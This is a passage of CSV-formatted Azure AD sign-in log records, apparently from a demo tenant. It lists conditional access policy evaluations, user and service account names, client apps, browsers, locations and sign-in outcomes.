'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c95450b3-582d-4306-9dd2-9bdade310e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1876,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:27.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1f9a3969-8e8a-4ad2-91ab-79bff8fae260,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",cbc0f99c-7bef-40f5-9b26-c77d4ded0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbc0f99c-7bef-40f5-9b26-c77d4ded0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1877,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:03.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a98127ee-0f95-4dbd-ac81-b86b729e7842,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5ba30877-fe5d-4dc4-8c19-e13f33c60f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5ba30877-fe5d-4dc4-8c19-e13f33c60f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1878,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:03.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3bb4b08-3bf0-41a7-96e5-da755e69f62d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fd7a6355-56f5-4bc2-9ad4-c259d8770f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,fd7a6355-56f5-4bc2-9ad4-c259d8770f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1879,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:06.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,66c5469f-00ac-0000-ccb2-a05b18298c2e,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,,[],notApplied,08/04/2020 14:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",1416e882-0702-4c93-abe4-fa3fa1eb4100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1416e882-0702-4c93-abe4-fa3fa1eb4100,SigninLogs,Failed,38.47222137,-77.41989899
+1880,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:38.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,83defa04-83b7-4f83-a13f-a63c03ecb518,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",99476ccd-67d1-454b-a7cf-079ec0851100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99476ccd-67d1-454b-a7cf-079ec0851100,SigninLogs,Sucess,33.7984581,-84.38828278
+1881,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:51.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e2f65695-98e4-495d-8201-c8ff0da22c35,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:13,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",f0d90a71-c139-4edc-9002-2dd7dc2e0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f0d90a71-c139-4edc-9002-2dd7dc2e0f00,SigninLogs,Sucess,38.73078156,-78.17196655
+1882,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:42.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,47e76f0e-b6db-470f-a4ab-9dbf42316846,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:13,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",9303d935-cf24-489a-bd00-a11c9df70f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9303d935-cf24-489a-bd00-a11c9df70f00,SigninLogs,Sucess,38.73078156,-78.17196655
+1883,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:14.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,09f3bb3a-8439-4ad4-9a36-d7e34b442031,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3a4d127f-5a89-4252-9f54-d79d91cc1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,3a4d127f-5a89-4252-9f54-d79d91cc1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1884,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:40.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,68962194-dc55-438d-b417-342efe72cccf,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 